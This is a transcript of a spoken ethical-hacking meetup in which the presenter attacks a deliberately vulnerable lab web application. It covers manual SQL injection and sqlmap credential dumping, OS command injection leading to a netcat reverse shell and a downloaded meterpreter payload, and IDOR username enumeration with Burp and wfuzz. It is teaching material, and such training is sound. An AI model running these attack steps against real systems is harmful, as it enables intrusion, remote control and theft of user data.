My name is Candan. This is my connection information about me / Rolukbash. You can find a lot of things over there. I'm a Bachelor of Science Computer Engineering, and I have a bunch of certificates including network, hacking, forensic investigation, incident response, secure application development, and I'm also CTO of Norm Shield Security. How many people know Norm Shield? Come on. Okay. At least it's a, if you're interested in security threat scorecard of your company, please let us know, okay? We can create a report, something like that, and you can see that whether you are about to get hacked on each individual category or you are in good shape. So this is what we are providing usually. So this is just a snapshot of your company. If you're interested in continuous security, that's also we deliver. So this is the end of the advertisement. Let's go back to our meetup. So I developed application for more than 7 years. I still develop. How many people know a programming language? Good. How many of them are Python? Okay, very good number. How about web developers? Web developers, good. So there are interesting concepts for you because SQL injection, cross-site scripting, file, uploading, those vulnerabilities are usually arise from the development mistakes or security misconfiguration. This is my email address. I work for President Sahar for many years. And also, this is my Twitter address. I support privacy and anonymity. So, what we are going to talk about today. So, in the previous week, we already covered SQL injection and cross-site scripting, right? How many people were aware of sqlmap? sqlmap? Okay, less number. How about wfuzz? Less number. Let's quickly cover that, okay? Let's start with SQL injection because that is the most important one. You need to be aware of that. So our lab includes two machines. One is bbax and the other one is Kali Linux, okay? This is our lab environment. So bbax is the target. We try to hack this machine and Kali is the attacker. So bbax IP address is 172.16.15.2.14 and we connect this machine via browser, okay? This is my browser. Okay, 172.52.16.242.14, right? It wasn't? Yeah, it was 16. Okay, this is our application. There are 5 applications here, but the first one is Broken Web Application. Is the lab for being a web application pen tester. It's a really extensively, useful one. So I strongly encourage you to use this lab to, develop yourself. It's actually supported by multiple platforms. For example, OWASP and the Zap proxy, NetSparker, and MME. Those guys are, supporting this platform. It's a really useful one. I also like this one too. The default username and password is already mentioned here, B and BAC. So when you log in that, it provides you a bunch of challenges to hack and to accomplish that. And one we used in the last week was the SQL injection. We are going to take a close look at some injection also. And also we take a look at the XSS and how we can exploit and cross-site scripting vulnerability. And we use the beef XSS. It was lovely, right? How many people remember the beef XSS? It was wonderful, right? It's awesome. I really liked it. And I really, upset for you, those guys who missed the beef XSS because, it's one of the favorite tool. So, how we can exploit an vulnerability? For example, if we start with the SQL injection, so maybe those guys who attended the last session can help me to how to exploit this box. For example, not select but search. Where is it? Okay, this one. Let's select search. Sorry, my wife. Okay, the first thing to identify whether it's an SQL injection vulnerability is how we can test. We should predict that whether there is an SQL statement running behind the scene and we should expect to manipulate that statement, right? The first starting point is if you search for an A, you get some results. This is a regular human behavior, right? But if you search for A and apostrophe, right? Apostrophe, okay. Apostrophe, then you get a SQL injection, SQL error. So at this point, you can understand that you change the structure of this of this application. So it says that there is a syntax error on near to percent signal. So what kind of SQL statement running behind the scene? So you need to guess that. Actually, this is you need to think like a developer. So if I were a developer, I will use an SQL statement like this one. SQL select star from probably movies because it's a movies screen. And where is the statement to search and filter the results? Where and maybe the movie name or something like movie underscore, let's say name, and the like, and in double apostrophe there should be percent, because this is usually used for searching for free text, right? So my parameter goes here, right? This is the parameter that I sent. So this is the actual statement, but what I'm doing is, when I send it a apostrophe, it causes this statement to function in an abnormal way, right? Because you didn't expect an apostrophe here, because apostrophe should be at the end, but you have an additional one at here. So it changes the structure. So, but you need this SQL statement to run properly, right? How can I accomplish this task? I would like to use apostrophe, but I want to not to get an error. How is this possible? Previous meetup, please. How?
Comment out the rest of it.
Yeah, comment out. So you can use sharp, or depending on SQL version, even dash dash. Both of them are possible for MySQL. So let's use this payload, right? Because this is my data. As you can see, the previous part and the later part is actually coming from the developer. The params is the middle part, is actually the data I created, right? So let's copy this statement and use it here. Oops, not here. Yeah. Okay. Okay, I think the percent dash dash is not working, but the percent, the sharp. So it's something different, right? I sent a sharp, but I get nothing. So the SQL statement ran correctly. So how can you manipulate the rest of the statement? Of course, it requires a little bit SQL knowledge, right? So you can use union select and some number of columns. So let's start with column number 6. Why I use this one? I know that the SQL statement up to now is select movies from movie table, where movie name like a apostrophe. The statement is completed, right? The rest is coming from me, so I would like to manipulate the statement. Union select 1, 2, 3, 4, 5, 6. So I'm trying to just guess the number of columns if available. So when I use this, I get the number of columns error. So which means I didn't correctly guess the number of columns. So if I use, but instead of 6, if I use 7, then I will get something like this. 2, 3, 4, 5 on the screen. That means your SQL statement run behind the scene and you get a result from the server. And server is saying that, hey, you want me to join nothing with 1, 2, 3, 4, 5, 6, 7. This is the result. Go and deal with that. So at this point, you understand that there is a SQL injection vulnerabilities exist. So this is what you can do. And of course, you need to manipulate your database and get some results. Let's get some results from the database and okay, and get the whole database. So this is the normal query. I go back because in order to use SQL in sqlmap, send an normal query to server. So if I send A, I get this one. So how can I use this? I need to use local proxy to get the statement and use it in sqlmap. So local proxy is something like this. When you use a browser usually communicates with the operating system. Let me draw it here. This is your browser, and this is your operating system. And this is the operating system network I/O buffer. Okay, I/O. Okay. Whenever you would like to send a package to Ethernet, you send it to OS. OS sends to network I/O buffer, and then it goes to on wire and goes to the target. Okay. But if you use a local proxy helps you to do this. instead of sending it directly to operating system, send it to me. I will send it to network IO buffer for you. So if you would like to manipulate your data, I will give you an interface to manipulate the data so you can better see what's going on behind the scene. So for example, I send A here, but where's my cookie? Where's my URL? Where's my host name? Where's my other stuff? So there has to be a lot because the HTTP communication requires a lot of stuff to run, but there's nothing here. So in order to see that, I'm going to use a local proxy. And one of the famous one is burp proxy. In order to run a burp proxy, you need to do this. Let me start from the stretch. Okay. If you run burpsuite, and I usually run ampersand. Ampersand means that run this command and leave me my command shell back to me. Okay. When it starts, it says that, hey, you want to create an project. No, I don't want to create. Just next, and it starts the burp proxy. The first time you open the burp proxy, you need to see that whether it's listening the port or not. So in order to check that, go to proxy and options. At here, you are going to see that it's listening on port 8080. Okay, let's check that whether there is an application listening that port. That's that. Okay, and I can see that 8080 is listened by Java, and actually burp is actually a Java application. So that's fine. That's working. So I need to, it's listening, but I need to redirect my browser to burp proxy, right? Because browser is not aware of to sending the packages to proxy. So let's do that. When you open your browser, go to Preference and Advanced and Network tab, and then Settings. Okay. When you open that, it shows that there is no proxy available. But choose, please, manual proxy. It's an HTTP proxy. The port is going to be 8080. The IP is your loopback IP address. So when you hit enter, okay, so it will help you to intercept the connection and also to manipulate the connection. It's in interception mode. So let's search again. So your browser is going to hang a couple of seconds until you send it to server. So when I come here, I can see my request is just right here. I can see my host name, user agent, all the encoding types, referrer, and also cookie. Okay, and I can see that the title is equal to A is just right here. So let it go to server. I can see it in the HTTP history here. Let's copy this. This is the way that we can create our request file, right? I'll copy this. I will create a request file for this. Okay. I will name this as request.txt. Paste the whole content here and save it. Okay, so I have my request file. I will use a sqlmap with a request file. So sqlmap stands for SQL injection exploitation. Okay, that is the perfect tool. You can take advantage of SQL injection. You can drill down the help of that, but I will show you the easiest way to use the sqlmap. sqlmap -r means that read the content from my request file, and a parameter should be tested for SQL injection, right? And the parameter is going to be the parameter that we identify, which is title, right? Okay, let's use the title. Okay, it will take the job and provide us that, hey, this is a MySQL database. Do you want me to exploit? Yes, please. Level 1.1, it's okay. Go ahead and test. So it's actually writing sophisticated SQL queries to server in order to identify whether it's vulnerable. So we just tested only union-based vulnerability, SQL injection, but it also tests, what is it? Boolean-based, and also Boolean base has to be error and also time base. Yeah, it's coming up, I think. Okay. So it tests 5 or 6 different SQL injection types in order to identify that which one is the suits for the best. Okay. Now let's wait for a couple of seconds. It should probably show up. Okay, this is time-based SQL injection. It takes time, of course, but this is the most common SQL injection I have ever seen, right? Because people usually don't think that there is a time-based SQL injection, but they are aware of union and blind SQL injection. So it says that it is vulnerable. Do you want me to test others? No, thank you. So we understand that it is vulnerable. It's seen here. Title is vulnerable. So how can I take advantage of that? How can I get data from a SQL injection vulnerable website? The thing is, after that, if you say that DBs means that bring me the databases. Okay, let's get the databases, and I can see that databases are right here. Okay, let's get the tables of bweb database minus tables. Okay, the database is bweb, and bring me the tables. Okay, so this is the tables, and which table you would like to see? Okay, let me scroll a little bit. Which table? Users is the best choice, right? Because it includes the credentials. Minus T users and dash dash dump. Okay. Okay, it says that, do you want me to save in a temporary file? Do you want me to crack the passwords? Yes, please. Use the default. It's just fine. Common password suffix. Don't need now. So what it's doing that, it sees that there is an hashes available on this database, and using its internal dictionary to attack these hashes and identify whether this is crackable hash, at least for this with this dictionary, and identifies the clear text password. So this is the pretty cool feature of sqlmap. So there you go. You have the database, although it seems a little bit crappy here, but if you copy this, okay, let's, come on, I need to copy this, but it doesn't allow me. There we go. Finally, we are here. Admin, login credentials, email, secret, passwords. Yeah, and the clear text password is bug actually. That's our password, of course. So this is how you can exploit an SQL injection, and I strongly encourage you to test the others. Okay, people. This is the only way that you can learn. Okay, if you test it regularly and if you try to, exploit these vulnerabilities with sqlmap and also your manual testing, it will help you a lot. Okay, but this is just a good starting point to exploit that. You may wonder that, hey, is there any SQL injection vulnerable website on the internet now? Tons of that. You can't believe that even. So actually, whenever I visit a web page, I usually test for SQL injection before giving any password or the credit card information. If it's vulnerable, stay away from that. So this is SQL injection. I don't want to spend a lot of time on that because we have another content today. Okay, now let me see my notepad because I took some notes to which. Okay, command injection is the another injection type that we would like to share with you. So we already covered the SQL injection, and there is one OS command injection right here. Okay, it's actually when you give a domain name, when you hit lookup. Come on, I need to connect to internet. Okay, let me fix that now because it's connecting to internet and resolving the domain name. Okay. Can we load this one? But present. Yeah, although we are hacker, we are pinging to 888. Yeah, similar behaviors, like human beings, normal human beings. Okay. Come on, we are running out of time, please. Okay, anyway, I still can exploit this machine without internet. Okay, let's give that some time. Local host. Okay, maybe I can put some dot at the end, so it may help me. Bear with me. Just give me 30 seconds, it will be solved. Okay, I think it's coming. Nova Labs is this one, right? That was written on the wall. Can you tell me the password? Lowercase or robots for you. This way? Letter U. Oh, okay. This way. I hope nobody is running a man-in-the-middle attack to me. Okay? In order to run this course successfully, I connected a shared network. Please stay away from my computer. Okay. Now, there we go. Perfect. So, it's when I search for a domain name, it just gives me the answer. Instead of nsa.go, so I don't want to get in trouble, I will choose Google. Okay. So, when I search for Google, it just gives me the answer. Are you guys familiar with this answer? It's actually output of a really famous tool, right? It's either dig or nslookup. If you run nslookup, let's say www.google.com, it will give you the very similar result, as you can see here, or even dig is going to give you the very similar results. Let me run this also. Yeah, these two. Okay, man, just leave me alone. Okay. So it seems that it is nslookup result, right? So let's think about that and let's think like a hacker. How can I exploit this machine? Because I thought that this developer is usually using some codes behind the scene and expect us to, send the proper inputs. But since we are, hacker candidates, we usually think differently. So let's think about this first. nslookup is our command, right? nslookup, and the syntax of nslookup is when you run with a domain, it just gives you the answer, right? So this is the simplest way of running this command. So it takes this command and running on the machine. How can I run additional commands with another command, right? Yeah, that's the way, right? For example, if you would like to run nslookup and then with another command, let's say ls, when you hit enter, you will get the response and also the content of the folder, right? Since the request.txt is my file on this directory, right? When I hit ls, it just gives me that. So it's a good idea to use with double AND. So let's test it. NSA go, let's get in trouble. Okay, then run ls. This is the simplest and easiest way to identify whether there is a command injection. There are a lot of cool stuff here. So it is command injection. It's vulnerable to that, but it's not funny, right? It's sitting, the content is sitting in here, but I need to get something really useful for me. So my question is, how can I get the command shell or meterpreter shell of this machine? Give me the ideas.
Make a send a request out.
Pardon me?
Maybe send an HTTP request out.
Yeah, that works. We need to create a listener, and also we need to really send a sophisticated HTTP request to our listener. Yeah, that works. It's technically possible, to be honest, but it's too difficult, even for me. Okay? Any other ideas? First of all, think about that. We need to get a command shell. Let's start with that. Then we can convert it to, meterpreter shell, right? So let's find a way. So you have an answer?
Domain and then netcat.
Perfect, good. So netcat is a good candidate, although it's not available on all machines, but it might be a good idea to use netcat. So this machine, it has. So it is vulnerable, and it's also, lets you to learn easily. So how netcat is working? Netcat, how many people are familiar with netcat? Good. Netcat is the perfect tool for, communicating with different parties. And in the cybersecurity space, if an application or if a tool ends with cat, it's usually for hacking tool, right? I never seen for example, netcat, DNS cat, and or what was it? What else? Ping cat, and what was that? Socket is also yeah. Okay, netcat stands for NC, and if you hit - help, or even single H only, okay, it says that E file name, but I don't need that. L means listen mount, so you can listen for a port, and you can specify the port name. So this will help you to listen a port. But it has an additional good command saying that if you use that -A, -E, means that you can run a command here. Perfect. So think about that. I'm going to listen on my server side, and I'm going to execute a command on the client side. And the client side is going to redirect the output to my server, right? So this is the plan. So let's accomplish our plan by doing this. Netcat, listen please, -port, let's use 4433. Okay, maybe you can use port 80 or 443 only. You have to choose a port usually available from inside to outside, okay? If you use, for example, 4444, it might not be allowed to, your client to travel to internet. So this is the command, it's listening, and let's hit our victim to connect back to us. Netcat, and I will say -E, bin/bash is my command shell, and also to which server. By the way, let's take a look at the help. Okay, host name and port. Okay, so this is the listen. Okay, this is the host name and port. And my IP address, let me check it. Okay, 172.16.52.203. Okay, let's copy this. I don't want to miss that. Okay, this is my IP address, and this is the port number. Okay, let's copy this and put it on a clean sheet. So what is going to happen is NS lookup is going to be concatenated with my request, and it is going to run this command, then run my command here. Okay, so I can put another ampersand here to run and give me the shell back. But let's keep that, so it's going to help us to better understand the scenario right now. But in the real case, put an ampersand at the end. So this is my payload. This is called a payload. So let's use Google here. I don't want to, have difficulty with NSA. I'm teaching a hacking course, and if I use the NSA, what they are going to think about me? Okay. Okay. So let's use lookup. As you can see, my browser is waiting here. Why? Yeah, because it's connected to my listener, but I can't see nothing here. But when I hit ls, I get the content right here. So it will help me to run some commands. If you are, have enough permissions, you can see the contents of the ifconfig. But again, I can see etc passwd. There is, and also I can cat etc shadow. Okay, it doesn't have any permission, so it's good. So I have a netcat connection right here, and I can convert it to meterpreter session, right? How can I run a meterpreter payload on this machine? So this is the second stage. We usually face this problem when running a penetration testing, because having a shell is good, but having a meterpreter shell is best. Okay, so how can I convert this command line to meterpreter shell. Now the second stage. Good. We need a binary first of all. We need to create a meterpreter for Linux. That's the first one. Then, how can I download a binary? I'm in command shell. I don't have any browser. Is there any way to download a file on command line? Yeah, of course. So anything you can do in GUI, you can do it on command shell. This is actually much more extended than normal GUI. So let's create a meterpreter payload for this machine. So MSF Venom is my so let's start it this way. MSF console. This is Metasploit, right? Do you want me to cover this? No, I think already you guys already familiar with Metasploit framework. I assume that. If you are not, please read and watch the previous meetup videos. We already covered this, but I'm planning to run another ethical hacking from this beginning. So maybe we can cover the Metasploit again on this course. But for this moment, we already covered this one. So what I'm going to use is exploit multi-handler. This stands for what? This is a generic handler. So if your client or victim you have a connection, you can push it to connect to an handler here. You should choose the payload. So I will use payload sets. Payload is going to be Linux. Yeah, it takes some time, but it waits sometimes when you type first. Linux meterpreter x64, I think, it's 86 slash meterpreter. Okay, then let's use reverse TCP. Reverse TCP. Okay, hit enter. Show options. L host. What's going to be the L host? The attacker, right? 172.16.52.203. Okay, let's see that. 203. Okay. And port is going to be 444. For this moment, it's okay, but in real life, you should use a proper port. So if I run show options again, I can see that my payload is okay, my port is okay, my IP is also okay. So I'm in good shape. When I run exploit, what's going to happen? Just listen. It's not going to do anything unless you hit somebody to connect to this box. So this is my payload. I will use the exact payload when creating the meterpreter. So MSF Venom is the creator of the meterpreter. So I will use the payload Linux x64 meterpreter reverse TCP and the L host. What was the syntax, by the way? Minus dash dash L host or okay, Linux. Okay, it doesn't require any L host, dash dash L host at least. Okay, L host is going to be 172.52.16.52.203. L port is going to be 4444 and minus format is going to be the raw format. Since it's a Linux, we usually choose Linux as a ELF. Yeah, that's a better idea. I prefer alpha. Okay. Extendable library file, I think. Then I will redirect to a file. What's going to be reverse TCP for Linux, and it's going to connect to 203 port 444. Okay, this is my notation. Okay, let's wait for a couple of seconds. So I have my meterpreter right here, but I need this guy to download my file. I need to create a web server, put it on a web server, right? How can I bring a web server alive? You can run Apache, but I will show you really useful command that's really help you a lot. Python, it has a simple HTTP server, so you can specify a port 8090. This helps you to serve any directory as a web server root directory. Okay, so when I hit enter, it will help me to serve this folder as a web application. So when I connect to my, let's say, what's it, 172.16.52.203, and the port is 8090, right? Okay, this is my meterpreter. When I hit copy link location, it will help me to download the file directly. So here's my session. I am here. I'm still connected. If I run wget, this one, okay, it's going to download my file to this folder. Let's check again. ls, and my file should be right here. Okay, there we go. We already downloaded our file. So let's run this. Okay, can I run just let me copy this name, copy and paste. Can I just type here and hit enter? Is it going to work? No, it's not. First of all, any file you downloaded from the internet, it's not going to be executable. In order to run, you need to change the permission. The proper change to change the permission is chmod change mod to 755, means allow me to do anything I want. The other groups can read and execute. Okay, 755 and this file. Okay, when I hit ls-l, this time I can easily see that this one is actually executable. So let's look at that. Okay, there we go. The owner is www.data because our credential is this one. So reverse TCP is going to be executable. When I hit this time, you can't just run and you can't just type the file name on Linux. You have to specify the directory name. That's why there is a /. Maybe it's hard to see that, but unfortunately I can't bring the screen here because I'm in a remote shell right now. So if I hit enter now, it's going to connect to this handler. Okay, so let's hit enter and cross our fingers. There we go. The stager goes. There we go. We have a meterpreter here. Let's see. System information. Bingo. We are in the machine. So this is the way. Even if you have a command line, even if you have a single command injection, you still can have a full meterpreter. And when you have a meterpreter, what else we can do? We can bypass 3 firewall, right? How many people remember that? Actually, 3 or 2 meetups before, we showed that if you have a meterpreter, you can hack entire network inside the firewall. Okay, even if there is a cascaded firewalls, it's okay. So if you know how to use this, it's a perfect tool to run your post-exploitation steps. Okay, so let's go back to our point. By the way, burp, when we wait burp a lot of time, it says that, hey, you're not doing anything, I'm out. So that's why you see that. So this is our payload, we send it. This is how command injection works. This is how we exploit and get a meterpreter shell, even if you have a normal shell. Is there any question for that? Is there anybody who would like to add something on this? Can I go to next one? Are we in good shape? How many people understand the attack vector? Good. Yeah, go ahead, please.
I noticed for you had a threshold you use for 444.
Uh-huh.
For the netcat,
Uh-huh.
you use 443.
Yeah,
Ports can be different.
actually, you have to use different ports for netcat listener and also your metasploit listener. So you need 2 ports to handle the both scenarios. Although there is a way to listen from your metasploit session and convert that metasploit session to directly to meterpreter session. Then you can use only one session. But since we are trying to make it a little bit extended way, that's why we need the 2 ports. But that's also possible with 1 port also. Okay, good question. Any question? Anybody else? Good. So let's go. And what's the next one? Okay, insecure direct object reference. Let's talk about this little bit on this application. I have an vulnerable and secure code examples, and I will cover this one here. So let me log out here, and it's running. It's not running. Okay. Oh, let me control F5. How many people writes .NET? .NET developer? Nobody? Good for you. Oh. Actually, please learn much more suitable languages and yeah. Okay, let me log in to this application. This is a normal app. It looks like a normal application. So my password is super complex password word. Okay, when I hit view my profile, it shows my profile here. So it doesn't seem anything, and I'm not sending any parameter to server, right? Is there any parameter here? I can't see. Why? Because we are not using proxy, right? We have to use proxy in order to identify a vulnerability. So this application is also running on my 4.jandan.local machine. So when I hit enter, I can see exactly the same application right here. Okay. So let me hit view my profile again. Okay, it's loading and it's here. So it shows the birthday, text file number, address, and things like that. So when I take a look at my HTTP history, the last request is actually stands for my request. So take a look at this request and tell me where I can try and attack payload. Which ones are coming from client? Which ones might be vulnerable for any kind of attacks? Okay, feel free. There are lots of good answers in this list. Cookie, good. That's one. Which? Get? You mean the URL? Second? What? Yeah, everything. The query string. Okay, good. What else? How about user agent? Is it coming from client or it's server? It's defined by server. It's client. Actually, everything in this screen is coming from client. Anything you can manipulate. Okay, anything. So you can manipulate the cookie, or even referrer, or even the X-requested width, or even accepted encoded language, user agent, and get, as long as the host name is you keep the host names your target, and other parameters, all of the other parameters can be manipulated and can be vulnerable. And even this referrer, there was a biggest vulnerability in the history coming from the referrer. Do you know which one? It's actually a kind of command injection. Does anybody remember that? Command injection from referrer or even some HTTP headers. Shell shock. Yeah? It's actually coming from this. Nobody handled the referrer parameter properly. It caused the command injection. It's actually a good example available on Bbox. I strongly encourage you to take a look at that. But our point is, get URL, and there is a question mark here, and it says username and my name. So I can manipulate this name to get some other results, right? I can put apostrophe and try to some, XSS payloads, things like that. But there is another attack method which is called insecure direct object reference, and it stands for so many developers are misdeveloping or making mistakes on role management. Okay, since I am the only one who should see my profile, but developers sometimes make mistake that allows me to access somebody else's profile while I'm not authorized. Okay, this is called insecure direct object reference. Means that if you ask on an object directly, you can access that, and there is an insecure, implementation of that. So how can I change this parameter? Because it's not here, it's not in the browser, I can't type anywhere, right? How can I do that? So I can intercept the query, of course. For example, if I open the interception on, and if I hit view my profile again, it's loading, but it's waiting, okay? And the request is just right here. It's waiting my answer. So if I change Jandan to, let's say, AAA, and forward the request, so I manipulated the request, and it's not updating, as you can see. So there is no answer for that. So this is not a proper way, by the way, testing the insecure direct object reference. There is a good way to do that. So this is my edited request. This is the original request. So if you right click on a request, there is an option that send to repeater. This allows you to, without using the browser, you can test the application, and also you can test some units that you would like to really test. So it's in my repeater in the first tab, and I can change AAA to anything. For example, if I send AAA, it says that internal server error. There is no answer coming from the server. But when I change it to Jandan, I can get the answer, right? See that? It's actually a JSON, and the user's client side is parsing the JSON and providing the content. So what I like to do is, what else can I access? For example, if I see a 500 HTTP 500 here, it's a really big indication that there should be something wrong here. Because showing a client a 500 internal server error means that I am a developer, I couldn't handle these exceptions, sorry about that, go ahead web server, deal with that. And web server is saying that, hey, I have no idea also, let's user to deal with that. So that's why you see this message. There is something wrong in this application. So let's deal with that. Let's control the username. So what else can I find in this list? For example, can I find another username? Because it's asking me a username. What else? What other usernames can be found on a database? Admin is a good guess, but my favorite is usually test. Okay, I start with this one because every developer creates a test object. This is the Hello World application, the source programming 101 course. Create a test object, but unfortunately this guy is not creating. So let's come to your point. Admin. I have 200. Although I tested with test, I get an internal server, but I get admin, and admin's birthday is 1st January 1980. So there is a really big mistake at here. So you saw that there is an insecure direct object reference is available for this application. Is this enough? No, we need to exploit, right? It's not funny. Finding the vulnerability only is not enough. So you have to, satisfy yourself. So just be curious. How many username and password, or how many user profiles can I extract from the server? But trying with hand, it's not easy, right? I need to do it in an automated way. How can I do that?
Sure.
Thanks to, burpsuite, it has an intruder. So if you send it to intruder, it will help you to run the automated way. So this is the target. It's okay. This is the positions. And intruder asking that, which position do we want me to manipulate? I don't want to manipulate everywhere, but only this name, okay? You can change this name with the parameters that I give you, okay? I choose this one and hit add, okay? Now it's going to try with admin, or change that word to get another results. So the payload is going to be what? Some username list, right? I need a username, good username list. So where can I find it? In Kali Linux, under user share, and where was that? Because I believe that I'm going to forget. That's why I took notes. Word list, wfuzz, general common. Okay. Word lists. Type word list, wfuzz, general, and common. It includes 950 usernames, and you can choose and optimize and fine-tune your attack payload, but this is enough for this moment. Of course, you can choose the different kinds of methods to attack the server. Maybe you can combine different lists. You can create a hash of the object. So those are the advanced topics. But for this moment, exploiting an insecure direct object reference goes this way. So if you hit start attack, it's a free edition, has some limits and also time limits available on that. So it's going to run for a certain amount of time. And I can see that some of them are returning 200, some of them are returning with 500, right? So I need only 200, so you can filter out that with only, I want to see only 200s, okay? So, for example, admin is what we get. And also, this is the original one, okay? It's running, but it will take time. And since we are, we don't want to wait, I will show you another way to exploit this attack, okay? If you are using the paid version of burpsuite, it's fine, but if you don't have, don't worry about that. There is a command for that. Let me show you. Okay, let's kill this. wfuzz is the application that helps you to send automated HTTP requests to a web server. This is the tool pretty much used for brute force attack, insecure direct object reference exploitation, forceful browsing, and also those kind of things. So the method is this way. You send the options with payloads and parameters and to a URL. So the options that is required at this moment is cookie, because this is an authenticated application, right? The first one is cookie, and the second one is you need to send some files to load the data from that, and that is -z, yeah. Payload, it's going to be this way. Z payload. What is the file name, by the way? Z payload. There has to be file, and I think the missing explanation here. Anyway, I will show the command. So okay, there it is. So z file user txt. So if I have, let's show this way. If I have a username file, I can use that with a password if you would like to fuzz both username and password, but I will fuzz only the username. So wfuzz is going to be my command, and I will use a file as a parameter, and this is going to be under user share word lists. Let's copy the exact file name. User share word list wfuzz and common. Put it out general. Okay. So let's copy this name. Slash common.txt. Okay, this is going to be my payload, and I would like to give the cookie, and the cookie is shown here. Cookie from right here, the beginning of the cookie to end of the cookie. It doesn't matter how long it is. Just select this and put it in double quote. Okay, put it in a quote this way. Oops, I couldn't copy. Okay, this is my cookie, and I would like to, let's start with the normal way, and then we can try the rest. Okay, the URL is going to be for.candan.com, http for.candan.local / this URL, right? Okay, and wfuzz expects you a proper keyword, which is fuzz. Okay, if you put a fuzz, it fuzzes the keyword with this one, with this name. So this is going to fuzz this place, then I will get the results. Okay, let's hit enter. So it's going pretty fast, and let me stop here. So as I can see that there are some 200s available here, and there are some 500s available here, right? So I would like to see only 200s because 500 means that I failed. So there is a way to do that in wfuzz. The only thing you need to do is show the codes with 200. I don't want to see the rest. Okay, when you hit enter, it tries and shows you only the ones that returns 200. So these are the other username that have in this database. See that? There are a lot. We found a lot of, other people's usernames. So you may think that where I can find this kind of vulnerability. I found it in an GSM operator. I would like to see my, billings on that online service. I tried, and it allows you to, see other people's, reports also. So they are using some kind of stuff behind the scene, but you can manipulate the parameters to access to somebody else's, bill. So I can see my father's, my mother's, my brother's, my wife's bills, and of course I didn't see anybody that I'm not authorized to see their bills. I hope you do the same thing. So